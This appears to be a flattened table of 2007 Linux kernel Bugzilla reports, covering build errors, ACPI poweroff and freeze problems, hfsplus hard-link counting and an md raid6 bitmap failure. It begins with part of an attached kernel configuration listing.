# CONFIG_BLK_DEV_SIS5513 is not set # CONFIG_BLK_DEV_SLC90E66 is not set # CONFIG_BLK_DEV_TRM290 is not set CONFIG_BLK_DEV_VIA82CXXX=y # CONFIG_BLK_DEV_TC86C001 is not set # CONFIG_IDE_ARM is not set CONFIG_BLK_DEV_IDEDMA=y # CONFIG_IDEDMA_IVB is not set # CONFIG_BLK_DEV_HD is not set # # SCSI device support # # CONFIG_RAID_ATTRS is not set CONFIG_SCSI=y CONFIG_SCSI_DMA=y # CONFIG_SCSI_TGT is not set # CONFIG_SCSI_NETLINK is not set CONFIG_SCSI_PROC_FS=y # # SCSI support type (disk, tape, CD-ROM) # CONFIG_BLK_DEV_SD=y # CONFIG_CHR_DEV_ST is not set # CONFIG_CHR_DEV_OSST is not set # CONFIG_BLK_DEV_SR is not set CONFIG_CHR_DEV_SG=y # CONFIG_CHR_DEV_SCH is not set # # Some SCSI devices (e.g. CD jukebox) support multiple LUNs # # CONFIG_SCSI_MULTI_LUN is not set # CONFIG_SCSI_CONSTANTS is not set # CONFIG_SCSI_LOGGING is not set # CONFIG_SCSI_SCAN_ASYNC is not set CONFIG_SCSI_WAIT_SCAN=m # # SCSI Transports # # CONFIG_SCSI_SPI_ATTRS is not set # CONFIG_SCSI_FC_ATTRS is not set # CONFIG_SCSI_ISCSI_ATTRS is not set # CONFIG_SCSI_SAS_LIBSAS is not set # CONFIG_SCSI_LOWLEVEL is not set # CONFIG_ATA is not set # CONFIG_MD is not set # # Fusion MPT device support # # CONFIG_FUSION is not set # CONFIG_FUSION_SPI is not set # CONFIG_FUSION_FC is not set # CONFIG_FUSION_SAS is not set # # IEEE 1394 (FireWire) support # # CONFIG_FIREWIRE is not set # CONFIG_IEEE1394 is not set # CONFIG_I2O is not set # CONFIG_MACINTOSH_DRIVERS is not set CONFIG_NETDEVICES=y # CONFIG_NETDEVICES_MULTIQUEUE is not set # CONFIG_DUMMY is not set # CONFIG_BONDING is not set # CONFIG_MACVLAN is not set # CONFIG_EQUALIZER is not set # CONFIG_TUN is not set # CONFIG_NET_SB1000 is not set # CONFIG_ARCNET is not set # CONFIG_NET_ETHERNET is not set # CONFIG_NETDEV_1000 is not set # CONFIG_NETDEV_10000 is not set # CONFIG_TR is not set # # Wireless LAN # # CONFIG_WLAN_PRE80211 is not set CONFIG_WLAN_80211=y # CONFIG_IPW2100 is not set # CONFIG_IPW2200 is not set # CONFIG_LIBERTAS is not set # CONFIG_AIRO is not set # CONFIG_HERMES is not set # CONFIG_ATMEL is not set # CONFIG_PRISM54 is not set CONFIG_USB_ZD1201=m # CONFIG_HOSTAP is not set # # USB Network Adapters # # CONFIG_USB_CATC is not set # CONFIG_USB_KAWETH is not set # CONFIG_USB_PEGASUS is not set # CONFIG_USB_RTL8150 is not set # CONFIG_USB_USBNET_MII is not set # CONFIG_USB_USBNET is not set # CONFIG_WAN is not set # CONFIG_FDDI is not set # CONFIG_HIPPI is not set # CONFIG_PPP is not set # CONFIG_SLIP is not set # CONFIG_NET_FC is not set # CONFIG_SHAPER is not set # CONFIG_NETCONSOLE is not set # CONFIG_NETPOLL is not set # CONFIG_NET_POLL_CONTROLLER is not set # CONFIG_ISDN is not set # CONFIG_PHONE is not set # # Input device support # CONFIG_INPUT=y # CONFIG_INPUT_FF_MEMLESS is not set # CONFIG_INPUT_POLLDEV is not set # # Userland interfaces # CONFIG_INPUT_MOUSEDEV=y CONFIG_INPUT_MOUSEDEV_PSAUX=y CONFIG_INPUT_MOUSEDEV_SCREEN_X=1024 CONFIG_INPUT_MOUSEDEV_SCREEN_Y=768 # CONFIG_INPUT_JOYDEV is not set # CONFIG_INPUT_TSDEV is not set # CONFIG_INPUT_EVDEV is not set # CONFIG_INPUT_EVBUG is not set # # Input Device Drivers # CONFIG_INPUT_KEYBOARD=y CONFIG_KEYBOARD_ATKBD=y # CONFIG_KEYBOARD_SUNKBD is not set # CONFIG_KEYBOARD_LKKBD is not set # CONFIG_KEYBOARD_XTKBD is not set # CONFIG_KEYBOARD_NEWTON is not set # CONFIG_KEYBOARD_STOWAWAY is not set CONFIG_INPUT_MOUSE=y CONFIG_MOUSE_PS2=y CONFIG_MOUSE_PS2_ALPS=y CONFIG_MOUSE_PS2_LOGIPS2PP=y CONFIG_MOUSE_PS2_SYNAPTICS=y CONFIG_MOUSE_PS2_LIFEBOOK=y CONFIG_MOUSE_PS2_TRACKPOINT=y # CONFIG_MOUSE_PS2_TOUCHKIT is not set # CONFIG_MOUSE_SERIAL is not set # CONFIG_MOUSE_APPLETOUCH is not set # CONFIG_MOUSE_VSXXXAA is not set # CONFIG_INPUT_JOYSTICK is not set # CONFIG_INPUT_TABLET is not set # CONFIG_INPUT_TOUCHSCREEN is not set # CONFIG_INPUT_MISC is not set # # Hardware I/O ports # CONFIG_SERIO=y CONFIG_SERIO_I8042=y # CONFIG_SERIO_SERPORT is not set # CONFIG_SERIO_CT82C710 is not set # CONFIG_SERIO_PCIPS2 is not set CONFIG_SERIO_LIBPS2=y # CONFIG_SERIO_RAW is not set # CONFIG_GAMEPORT is not set # # Character devices # CONFIG_VT=y CONFIG_VT_CONSOLE=y CONFIG_HW_CONSOLE=y # CONFIG_VT_HW_CONSOLE_BINDING is not set # CONFIG_SERIAL_NONSTANDARD is not set # # Serial drivers # CONFIG_SERIAL_8250=y # CONFIG_SERIAL_8250_CONSOLE is not set CONFIG_FIX_EARLYCON_MEM=y CONFIG_SERIAL_8250_PCI=y CONFIG_SERIAL_8250_PNP=y CONFIG_SERIAL_8250_NR_UARTS=4 CONFIG_SERIAL_8250_RUNTIME_UARTS=4 # CONFIG_SERIAL_8250_EXTENDED is not set # # Non-8250 serial port support # CONFIG_SERIAL_CORE=y # CONFIG_SERIAL_JSM is not set CONFIG_UNIX98_PTYS=y CONFIG_LEGACY_PTYS=y CONFIG_LEGACY_PTY_COUNT=256 # CONFIG_IPMI_HANDLER is not set # CONFIG_WATCHDOG is not set # CONFIG_HW_RANDOM is not set # CONFIG_NVRAM is not set # CONFIG_RTC is not set # CONFIG_GEN_RTC is not set # CONFIG_R3964 is not set # CONFIG_APPLICOM is not set # CONFIG_SONYPI is not set CONFIG_AGP=y # CONFIG_AGP_ALI is not set # CONFIG_AGP_ATI is not set # CONFIG_AGP_AMD is not set # CONFIG_AGP_AMD64 is not set # CONFIG_AGP_INTEL is not set # CONFIG_AGP_NVIDIA is not set # CONFIG_AGP_SIS is not set # CONFIG_AGP_SWORKS is not set CONFIG_AGP_VIA=y # CONFIG_AGP_EFFICEON is not set # CONFIG_DRM is not set # CONFIG_MWAVE is not set # CONFIG_PC8736x_GPIO is not set # CONFIG_NSC_GPIO is not set # CONFIG_CS5535_GPIO is not set # CONFIG_RAW_DRIVER is not set # CONFIG_HPET is not set # CONFIG_HANGCHECK_TIMER is not set # CONFIG_TCG_TPM is not set # CONFIG_TELCLOCK is not set CONFIG_DEVPORT=y CONFIG_I2C=y CONFIG_I2C_BOARDINFO=y CONFIG_I2C_CHARDEV=y # # I2C Algorithms # # CONFIG_I2C_ALGOBIT is not set # CONFIG_I2C_ALGOPCF is not set # CONFIG_I2C_ALGOPCA is not set # # I2C Hardware Bus support # # CONFIG_I2C_ALI1535 is not set # CONFIG_I2C_ALI1563 is not set # CONFIG_I2C_ALI15X3 is not set # CONFIG_I2C_AMD756 is not set # CONFIG_I2C_AMD8111 is not set # CONFIG_I2C_I801 is not set # CONFIG_I2C_I810 is not set # CONFIG_I2C_PIIX4 is not set # CONFIG_I2C_NFORCE2 is not set # CONFIG_I2C_OCORES is not set # CONFIG_I2C_PARPORT_LIGHT is not set # CONFIG_I2C_PROSAVAGE is not set # CONFIG_I2C_SAVAGE4 is not set # CONFIG_I2C_SIMTEC is not set # CONFIG_SCx200_ACB is not set # CONFIG_I2C_SIS5595 is not set # CONFIG_I2C_SIS630 is not set # CONFIG_I2C_SIS96X is not set # CONFIG_I2C_TAOS_EVM is not set # CONFIG_I2C_STUB is not set # CONFIG_I2C_TINY_USB is not set # CONFIG_I2C_VIA is not set CONFIG_I2C_VIAPRO=y # CONFIG_I2C_VOODOO3 is not set # # Miscellaneous I2C Chip support # # CONFIG_SENSORS_DS1337 is not set # CONFIG_SENSORS_DS1374 is not set # CONFIG_DS1682 is not set CONFIG_SENSORS_EEPROM=y # CONFIG_SENSORS_PCF8574 is not set # CONFIG_SENSORS_PCA9539 is not set # CONFIG_SENSORS_PCF8591 is not set # CONFIG_SENSORS_MAX6875 is not set # CONFIG_SENSORS_TSL2550 is not set # CONFIG_I2C_DEBUG_CORE is not set # CONFIG_I2C_DEBUG_ALGO is not set # CONFIG_I2C_DEBUG_BUS is not set # CONFIG_I2C_DEBUG_CHIP is not set # # SPI support # # CONFIG_SPI is not set # CONFIG_SPI_MASTER is not set # CONFIG_W1 is not set # CONFIG_POWER_SUPPLY is not set CONFIG_HWMON=y CONFIG_HWMON_VID=y # CONFIG_SENSORS_ABITUGURU is not set # CONFIG_SENSORS_ABITUGURU3 is not set # CONFIG_SENSORS_AD7418 is not set # CONFIG_SENSORS_ADM1021 is not set # CONFIG_SENSORS_ADM1025 is not set # CONFIG_SENSORS_ADM1026 is not set # CONFIG_SENSORS_ADM1029 is not set # CONFIG_SENSORS_ADM1031 is not set # CONFIG_SENSORS_ADM9240 is not set # CONFIG_SENSORS_K8TEMP is not set # CONFIG_SENSORS_ASB100 is not set # CONFIG_SENSORS_ATXP1 is not set # CONFIG_SENSORS_DS1621 is not set # CONFIG_SENSORS_F71805F is not set # CONFIG_SENSORS_FSCHER is not set # CONFIG_SENSORS_FSCPOS is not set # CONFIG_SENSORS_GL518SM is not set # CONFIG_SENSORS_GL520SM is not set # CONFIG_SENSORS_CORETEMP is not set # CONFIG_SENSORS_IT87 is not set # CONFIG_SENSORS_LM63 is not set # CONFIG_SENSORS_LM75 is not set # CONFIG_SENSORS_LM77 is not set # CONFIG_SENSORS_LM78 is not set # CONFIG_SENSORS_LM80 is not set # CONFIG_SENSORS_LM83 is not set # CONFIG_SENSORS_LM85 is not set # CONFIG_SENSORS_LM87 is not set # CONFIG_SENSORS_LM90 is not set # CONFIG_SENSORS_LM92 is not set # CONFIG_SENSORS_LM93 is not set # CONFIG_SENSORS_MAX1619 is not set # CONFIG_SENSORS_MAX6650 is not set # CONFIG_SENSORS_PC87360 is not set # CONFIG_SENSORS_PC87427 is not set # CONFIG_SENSORS_SIS5595 is not set # CONFIG_SENSORS_DME1737 is not set # CONFIG_SENSORS_SMSC47M1 is not set # CONFIG_SENSORS_SMSC47M192 is not set # CONFIG_SENSORS_SMSC47B397 is not set # CONFIG_SENSORS_THMC50 is not set # CONFIG_SENSORS_VIA686A is not set # CONFIG_SENSORS_VT1211 is not set # CONFIG_SENSORS_VT8231 is not set # CONFIG_SENSORS_W83781D is not set # CONFIG_SENSORS_W83791D is not set # CONFIG_SENSORS_W83792D is not set # CONFIG_SENSORS_W83793 is not set # CONFIG_SENSORS_W83L785TS is not set CONFIG_SENSORS_W83627HF=y # CONFIG_SENSORS_W83627EHF is not set # CONFIG_SENSORS_HDAPS is not set # CONFIG_SENSORS_APPLESMC is not set # CONFIG_HWMON_DEBUG_CHIP is not set # # Multifunction device drivers # # CONFIG_MFD_SM501 is not set # # Multimedia devices # # CONFIG_VIDEO_DEV is not set # CONFIG_DVB_CORE is not set # CONFIG_DAB is not set # # Graphics support # # CONFIG_BACKLIGHT_LCD_SUPPORT is not set # # Display device support # # CONFIG_DISPLAY_SUPPORT is not set # CONFIG_VGASTATE is not set # CONFIG_VIDEO_OUTPUT_CONTROL is not set CONFIG_FB=y # CONFIG_FIRMWARE_EDID is not set # CONFIG_FB_DDC is not set CONFIG_FB_CFB_FILLRECT=y CONFIG_FB_CFB_COPYAREA=y CONFIG_FB_CFB_IMAGEBLIT=y # CONFIG_FB_SYS_FILLRECT is not set # CONFIG_FB_SYS_COPYAREA is not set # CONFIG_FB_SYS_IMAGEBLIT is not set # CONFIG_FB_SYS_FOPS is not set CONFIG_FB_DEFERRED_IO=y # CONFIG_FB_SVGALIB is not set # CONFIG_FB_MACMODES is not set # CONFIG_FB_BACKLIGHT is not set # CONFIG_FB_MODE_HELPERS is not set # CONFIG_FB_TILEBLITTING is not set # # Frame buffer hardware drivers # # CONFIG_FB_CIRRUS is not set # CONFIG_FB_PM2 is not set # CONFIG_FB_CYBER2000 is not set # CONFIG_FB_ARC is not set # CONFIG_FB_ASILIANT is not set # CONFIG_FB_IMSTT is not set # CONFIG_FB_VGA16 is not set CONFIG_FB_VESA=y # CONFIG_FB_HECUBA is not set # CONFIG_FB_HGA is not set # CONFIG_FB_S1D13XXX is not set # CONFIG_FB_NVIDIA is not set # CONFIG_FB_RIVA is not set # CONFIG_FB_I810 is not set # CONFIG_FB_LE80578 is not set # CONFIG_FB_INTEL is not set # CONFIG_FB_MATROX is not set # CONFIG_FB_RADEON is not set # CONFIG_FB_ATY128 is not set # CONFIG_FB_ATY is not set # CONFIG_FB_S3 is not set # CONFIG_FB_SAVAGE is not set # CONFIG_FB_SIS is not set # CONFIG_FB_NEOMAGIC is not set # CONFIG_FB_KYRO is not set # CONFIG_FB_3DFX is not set # CONFIG_FB_VOODOO1 is not set # CONFIG_FB_VT8623 is not set # CONFIG_FB_CYBLA is not set # CONFIG_FB_TRIDENT is not set # CONFIG_FB_ARK is not set # CONFIG_FB_PM3 is not set # CONFIG_FB_GEODE is not set # CONFIG_FB_VIRTUAL is not set # # Console display driver support # CONFIG_VGA_CONSOLE=y # CONFIG_VGACON_SOFT_SCROLLBACK is not set CONFIG_VIDEO_SELECT=y CONFIG_DUMMY_CONSOLE=y CONFIG_FRAMEBUFFER_CONSOLE=y # CONFIG_FRAMEBUFFER_CONSOLE_DETECT_PRIMARY is not set # CONFIG_FRAMEBUFFER_CONSOLE_ROTATION is not set # CONFIG_FONTS is not set CONFIG_FONT_8x8=y CONFIG_FONT_8x16=y # CONFIG_LOGO is not set # # Sound # CONFIG_SOUND=y # # Advanced Linux Sound Architecture # CONFIG_SND=y CONFIG_SND_TIMER=y CONFIG_SND_PCM=y CONFIG_SND_HWDEP=y CONFIG_SND_RAWMIDI=y CONFIG_SND_SEQUENCER=y # CONFIG_SND_SEQ_DUMMY is not set CONFIG_SND_OSSEMUL=y CONFIG_SND_MIXER_OSS=y CONFIG_SND_PCM_OSS=y CONFIG_SND_PCM_OSS_PLUGINS=y CONFIG_SND_SEQUENCER_OSS=y # CONFIG_SND_DYNAMIC_MINORS is not set # CONFIG_SND_SUPPORT_OLD_API is not set CONFIG_SND_VERBOSE_PROCFS=y # CONFIG_SND_VERBOSE_PRINTK is not set # CONFIG_SND_DEBUG is not set # # Generic devices # CONFIG_SND_AC97_CODEC=y # CONFIG_SND_DUMMY is not set # CONFIG_SND_VIRMIDI is not set # CONFIG_SND_MTPAV is not set # CONFIG_SND_SERIAL_U16550 is not set # CONFIG_SND_MPU401 is not set # # PCI devices # # CONFIG_SND_AD1889 is not set # CONFIG_SND_ALS300 is not set # CONFIG_SND_ALS4000 is not set # CONFIG_SND_ALI5451 is not set # CONFIG_SND_ATIIXP is not set # CONFIG_SND_ATIIXP_MODEM is not set # CONFIG_SND_AU8810 is not set # CONFIG_SND_AU8820 is not set # CONFIG_SND_AU8830 is not set # CONFIG_SND_AZT3328 is not set # CONFIG_SND_BT87X is not set # CONFIG_SND_CA0106 is not set # CONFIG_SND_CMIPCI is not set # CONFIG_SND_CS4281 is not set # CONFIG_SND_CS46XX is not set # CONFIG_SND_CS5530 is not set # CONFIG_SND_CS5535AUDIO is not set # CONFIG_SND_DARLA20 is not set # CONFIG_SND_GINA20 is not set # CONFIG_SND_LAYLA20 is not set # CONFIG_SND_DARLA24 is not set # CONFIG_SND_GINA24 is not set # CONFIG_SND_LAYLA24 is not set # CONFIG_SND_MONA is not set # CONFIG_SND_MIA is not set # CONFIG_SND_ECHO3G is not set # CONFIG_SND_INDIGO is not set # CONFIG_SND_INDIGOIO is not set # CONFIG_SND_INDIGODJ is not set CONFIG_SND_EMU10K1=y # CONFIG_SND_EMU10K1X is not set # CONFIG_SND_ENS1370 is not set # CONFIG_SND_ENS1371 is not set # CONFIG_SND_ES1938 is not set # CONFIG_SND_ES1968 is not set # CONFIG_SND_FM801 is not set # CONFIG_SND_HDA_INTEL is not set # CONFIG_SND_HDSP is not set # CONFIG_SND_HDSPM is not set # CONFIG_SND_ICE1712 is not set # CONFIG_SND_ICE1724 is not set # CONFIG_SND_INTEL8X0 is not set # CONFIG_SND_INTEL8X0M is not set # CONFIG_SND_KORG1212 is not set # CONFIG_SND_MAESTRO3 is not set # CONFIG_SND_MIXART is not set # CONFIG_SND_NM256 is not set # CONFIG_SND_PCXHR is not set # CONFIG_SND_RIPTIDE is not set # CONFIG_SND_RME32 is not set # CONFIG_SND_RME96 is not set # CONFIG_SND_RME9652 is not set # CONFIG_SND_SONICVIBES is not set # CONFIG_SND_TRIDENT is not set # CONFIG_SND_VIA82XX is not set # CONFIG_SND_VIA82XX_MODEM is not set # CONFIG_SND_VX222 is not set # CONFIG_SND_YMFPCI is not set # CONFIG_SND_AC97_POWER_SAVE is not set # # USB devices # # CONFIG_SND_USB_AUDIO is not set # CONFIG_SND_USB_USX2Y is not set # CONFIG_SND_USB_CAIAQ is not set # # System on Chip audio support # # CONFIG_SND_SOC is not set # # SoC Audio support for SuperH # # # Open Sound System # # CONFIG_SOUND_PRIME is not set CONFIG_AC97_BUS=y CONFIG_HID_SUPPORT=y CONFIG_HID=y # CONFIG_HID_DEBUG is not set # # USB Input Devices # CONFIG_USB_HID=y # CONFIG_USB_HIDINPUT_POWERBOOK is not set # CONFIG_HID_FF is not set # CONFIG_USB_HIDDEV is not set CONFIG_USB_SUPPORT=y CONFIG_USB_ARCH_HAS_HCD=y CONFIG_USB_ARCH_HAS_OHCI=y CONFIG_USB_ARCH_HAS_EHCI=y CONFIG_USB=y CONFIG_USB_DEBUG=y # # Miscellaneous USB options # CONFIG_USB_DEVICEFS=y # CONFIG_USB_DEVICE_CLASS is not set # CONFIG_USB_DYNAMIC_MINORS is not set # CONFIG_USB_SUSPEND is not set # CONFIG_USB_PERSIST is not set # CONFIG_USB_OTG is not set # # USB Host Controller Drivers # CONFIG_USB_EHCI_HCD=y # CONFIG_USB_EHCI_SPLIT_ISO is not set # CONFIG_USB_EHCI_ROOT_HUB_TT is not set # CONFIG_USB_EHCI_TT_NEWSCHED is not set # CONFIG_USB_ISP116X_HCD is not set # CONFIG_USB_OHCI_HCD is not set CONFIG_USB_UHCI_HCD=y # CONFIG_USB_SL811_HCD is not set # CONFIG_USB_R8A66597_HCD is not set # # USB Device Class drivers # # CONFIG_USB_ACM is not set # CONFIG_USB_PRINTER is not set # # NOTE: USB_STORAGE enables SCSI, and 'SCSI disk support' # # # may also be needed; see USB_STORAGE Help for more information # CONFIG_USB_STORAGE=y # CONFIG_USB_STORAGE_DEBUG is not set # CONFIG_USB_STORAGE_DATAFAB is not set # CONFIG_USB_STORAGE_FREECOM is not set # CONFIG_USB_STORAGE_ISD200 is not set # CONFIG_USB_STORAGE_DPCM is not set # CONFIG_USB_STORAGE_USBAT is not set # CONFIG_USB_STORAGE_SDDR09 is not set # CONFIG_USB_STORAGE_SDDR55 is not set # CONFIG_USB_STORAGE_JUMPSHOT is not set # CONFIG_USB_STORAGE_ALAUDA is not set # CONFIG_USB_STORAGE_KARMA is not set # CONFIG_USB_LIBUSUAL is not set # # USB Imaging devices # # CONFIG_USB_MDC800 is not set # CONFIG_USB_MICROTEK is not set CONFIG_USB_MON=y # # USB port drivers # # # USB Serial Converter support # # CONFIG_USB_SERIAL is not set # # USB Miscellaneous drivers # # CONFIG_USB_EMI62 is not set # CONFIG_USB_EMI26 is not set # CONFIG_USB_ADUTUX is not set # CONFIG_USB_AUERSWALD is not set # CONFIG_USB_RIO500 is not set # CONFIG_USB_LEGOTOWER is not set # CONFIG_USB_LCD is not set # CONFIG_USB_BERRY_CHARGE is not set # CONFIG_USB_LED is not set # CONFIG_USB_CYPRESS_CY7C63 is not set # CONFIG_USB_CYTHERM is not set # CONFIG_USB_PHIDGET is not set # CONFIG_USB_IDMOUSE is not set # CONFIG_USB_FTDI_ELAN is not set # CONFIG_USB_APPLEDISPLAY is not set # CONFIG_USB_SISUSBVGA is not set # CONFIG_USB_LD is not set # CONFIG_USB_TRANCEVIBRATOR is not set # CONFIG_USB_IOWARRIOR is not set # CONFIG_USB_TEST is not set # # USB DSL modem support # # # USB Gadget Support # # CONFIG_USB_GADGET is not set # CONFIG_MMC is not set # CONFIG_NEW_LEDS is not set # CONFIG_INFINIBAND is not set # CONFIG_EDAC is not set # CONFIG_RTC_CLASS is not set # # DMA Engine support # # CONFIG_DMA_ENGINE is not set # # DMA Clients # # # DMA Devices # # CONFIG_VIRTUALIZATION is not set # # Userspace I/O # # CONFIG_UIO is not set # # File systems # CONFIG_EXT2_FS=y # CONFIG_EXT2_FS_XATTR is not set # CONFIG_EXT2_FS_XIP is not set CONFIG_EXT3_FS=y # CONFIG_EXT3_FS_XATTR is not set # CONFIG_EXT4DEV_FS is not set CONFIG_JBD=y # CONFIG_JBD_DEBUG is not set # CONFIG_REISERFS_FS is not set # CONFIG_JFS_FS is not set # CONFIG_FS_POSIX_ACL is not set # CONFIG_XFS_FS is not set # CONFIG_GFS2_FS is not set # CONFIG_OCFS2_FS is not set # CONFIG_MINIX_FS is not set # CONFIG_ROMFS_FS is not set CONFIG_INOTIFY=y CONFIG_INOTIFY_USER=y # CONFIG_QUOTA is not set CONFIG_DNOTIFY=y # CONFIG_AUTOFS_FS is not set # CONFIG_AUTOFS4_FS is not set # CONFIG_FUSE_FS is not set # # CD-ROM/DVD Filesystems # CONFIG_ISO9660_FS=y CONFIG_JOLIET=y CONFIG_ZISOFS=y # CONFIG_UDF_FS is not set # # DOS/FAT/NT Filesystems # CONFIG_FAT_FS=y CONFIG_MSDOS_FS=y CONFIG_VFAT_FS=y CONFIG_FAT_DEFAULT_CODEPAGE=850 CONFIG_</t>
  </si>
  <si>
    <t>lro_flush_all [drivers/net/myri10ge/myri10ge.ko] undefined!</t>
  </si>
  <si>
    <t>d85714d81cc0408daddb68c10f7fd69eafe7c213</t>
  </si>
  <si>
    <t>2007-10-18 17:58 UTC</t>
  </si>
  <si>
    <t>2007-11-02 08:54 UTC</t>
  </si>
  <si>
    <t>The bug in this URL still exists against drivers/net/myri10ge, I have two configs (attached) so far that I have found with my randconfig script that hit this bug: http://marc.info/?l=linux-kernel&amp;m=119231305629026&amp;w=2 More information about this bug: ERROR: "lro_flush_all" [drivers/net/myri10ge/myri10ge.ko] undefined! ERROR: "lro_receive_frags" [drivers/net/myri10ge/myri10ge.ko] undefined!</t>
  </si>
  <si>
    <t>ir-functions.c:(.text+0xbce18): undefined reference to `input_event'</t>
  </si>
  <si>
    <t>v2.6.23</t>
  </si>
  <si>
    <t>2007-10-18 20:52 UTC</t>
  </si>
  <si>
    <t>2008-09-26 07:23 UTC</t>
  </si>
  <si>
    <t>I was running randconfig and found the following problem. Config attached: drivers/built-in.o: In function `ir_input_key_event': ir-functions.c:(.text+0xbce18): undefined reference to `input_event' ir-functions.c:(.text+0xbce26): undefined reference to `input_event' drivers/built-in.o: In function `ir_detach': ir-kbd-i2c.c:(.text+0xc4fc9): undefined reference to `input_unregister_device' drivers/built-in.o: In function `ir_probe': ir-kbd-i2c.c:(.text+0xc5317): undefined reference to `input_allocate_device' ir-kbd-i2c.c:(.text+0xc5394): undefined reference to `input_free_device' ir-kbd-i2c.c:(.text+0xc5486): undefined reference to `input_register_device' drivers/built-in.o: In function `saa7134_input_fini': (.text+0xdc646): undefined reference to `input_unregister_device' drivers/built-in.o: In function `saa7134_input_init1': (.text+0xdcb3a): undefined reference to `input_allocate_device' drivers/built-in.o: In function `saa7134_input_init1': (.text+0xdcc79): undefined reference to `input_register_device' drivers/built-in.o: In function `saa7134_input_init1': (.text+0xdcc9f): undefined reference to `input_free_device' drivers/built-in.o: In function `cx88_ir_fini': (.text+0xe10ed): undefined reference to `input_unregister_device' drivers/built-in.o: In function `cx88_ir_init': (.text+0xe1184): undefined reference to `input_allocate_device' drivers/built-in.o: In function `cx88_ir_init': (.text+0xe11b4): undefined reference to `input_free_device' drivers/built-in.o: In function `cx88_ir_init': (.text+0xe1318): undefined reference to `input_register_device'</t>
  </si>
  <si>
    <t>computer power will not turn off at (init 0) shutdown - 2.6.23 regression</t>
  </si>
  <si>
    <t>2.6,23.1</t>
  </si>
  <si>
    <t>2007-10-19 20:15 UTC</t>
  </si>
  <si>
    <t>Stan Senuta Jr.</t>
  </si>
  <si>
    <t>2008-01-13 23:40 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur:2.6.22.1 Distribution: Mandriva Discovery 2006 Hardware Environment: Desktop computer with Asus A8v-MX board &amp; both a Sata &amp; Pata drive installed Software Environment: Lilo boot loader; vesa_fb console; KDE-3.4.2 Problem Description:I just upgraded to kernel-2.6.23.1 from kernel-2.6.22.1 and now my computer power will not turn off at (init 0) shutdown. It just freezes up forcing me to use the reset button However, if I choose (init 6) reboot, the computer will reboot To avoid this problem I have to disable (operating system controlled) ACPI in my lilo.conf with the acpi=off option. This allows Linux to substitute the older (bios controlled) APM technology of power management &amp; my computer will then poweroff. Kernel-2.6.23.1 was compiled with my existing 2.6.22.1 .config file &amp; their ACPI modules folders show the same drivers except for video.ko which is only present in kernel-2.6.23.1 Also, a check of my /var/log/messages shows this: ACPI Warning (tbutils-0217): Incorrect checksum in table [OEMB] - E2, should be D5 [20070126]. This warning doesn't mean anything to me but it may be important to you. Steps to reproduce:Type the command shutdown -h now</t>
  </si>
  <si>
    <t>TORiSAN "CD-ROM CDR_U200" for dma blacklist</t>
  </si>
  <si>
    <t>2.6.24-rc2</t>
  </si>
  <si>
    <t>2007-10-19 20:24 UTC</t>
  </si>
  <si>
    <t>snowbat</t>
  </si>
  <si>
    <t>2007-11-23 06:05 UTC</t>
  </si>
  <si>
    <t>2007-10-21 07:26 UTC</t>
  </si>
  <si>
    <t>kernel-bugzilla</t>
  </si>
  <si>
    <t>2008-06-13 21:30 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: n/a Distribution: n/a Hardware Environment: Samsung X65 (x86_64) Software Environment: ?? Problem Description: On my Samsung X65 notebook (Intel PM965 + ICH8M, Core 2 DUo), almost all ACPI modules lead to a complete freeze of the machine, leaving no error messages. I blacklisted the modules ac battery button fan processor thermal. Only basic ACPI support gets loaded upon system boot. modprobe fan works fine - the module gets loaded, no freeze. All other modules freeze the system. I extracted and recompiled DSDT, but encountered no errors and no warnings. I will attach several debugging outputs. I reproduced this with several kernels, vanilla 2.6.23.1, vanilla 2.6.22, 2.6.22-ubuntu, and without the nvidia binary module - it makes no difference. Steps to reproduce: Load any ACPI sub-module, like: modprobe processor</t>
  </si>
  <si>
    <t>unlink broken in hfsplus - hard links</t>
  </si>
  <si>
    <t>2007-10-21 09:14 UTC</t>
  </si>
  <si>
    <t>till busch</t>
  </si>
  <si>
    <t>2008-08-13 01:56 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: kubuntu 7.10 gutsy Hardware Environment: MacBookPro 3.1 Software Environment: /home partition shared with OSX Problem Description: i'm using hfsplus for my /home (it is shared with osx). i'm having problems with hard links on hfsplus. the link count for a file with hard links drops from n to 0 when removing one linked file. Steps to reproduce: install diskdev-cmds from: http://gentoo.osuosl.org/distfiles/diskdev_cmds-332.14.tar.gz http://gentoo.osuosl.org/distfiles/diskdev_cmds-332.14.patch.bz2 make -f Makefile.lnx interesting binaries are in newfs_hfs.tproj/ and fsck_hfs.tproj/ create a filesystem: dd if=/dev/zero of=/tmp/hfsplus bs=1M count=2 newfs_hfs /tmp/hfsplus mkdir /tmp/mnt mount -oloop /tmp/hfsplus /tmp/mnt cd /tmp/mnt echo foo &gt; foo ln foo foo1 ln foo foo2 ln foo foo3 # now check the link count: ls -laFi # it is ok # now unlink foo3 rm foo3 # check link count again ls -laFi # link count is down to 0</t>
  </si>
  <si>
    <t>reiserfs NET=n build error</t>
  </si>
  <si>
    <t>&gt;2.6.19-rc6</t>
  </si>
  <si>
    <t>2007-10-21 11:02 UTC</t>
  </si>
  <si>
    <t>2008-09-23 14:33 UTC</t>
  </si>
  <si>
    <t>This bug still exists in mainline. Original discussion: http://lkml.org/lkml/2006/11/18/151</t>
  </si>
  <si>
    <t>Negative internal write-intent bitmap offset with metadata 1.0 REDUX in raid 6: kernel refuses to start the array</t>
  </si>
  <si>
    <t>2007-10-21 21:49 UTC</t>
  </si>
  <si>
    <t>Joshua Charles Campbell</t>
  </si>
  <si>
    <t>2007-10-22 22:34 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.22 Distribution: gentoo (vanilla k.o kernel) Hardware Environment: pentium4 Software Environment: gentoo stable Problem Description: I believe is directly related to "[PATCH 007 of 7] md: Change bitmap_unplug and others to void functions." I have confirmed that this problem occurs during initial creation of the MD device with mdadm 2.6.4. The specific error I am getting is md3: bitmap initialized from disk: read 28/28 pages, set 0 bits created bitmap (442 pages) for device md3 md3: disabling internal bitmap due to errors md3: failed to create bitmap (-5) md: pers-&gt;run() failed ... superblock information from mdstat mdadm -E /dev/sx8/0p5 /dev/sx8/0p5: Magic : a92b4efc Version : 01 Feature Map : 0x1 Array UUID : b772776b:e2810279:bf64284e:65700530 Name : data2 Creation Time : Wed Jul 18 11:21:56 2007 Raid Level : raid6 Raid Devices : 12 Used Dev Size : 462671664 (220.62 GiB 236.89 GB) Array Size : 4626716160 (2206.19 GiB 2368.88 GB) Used Size : 462671616 (220.62 GiB 236.89 GB) Super Offset : 462671920 sectors State : 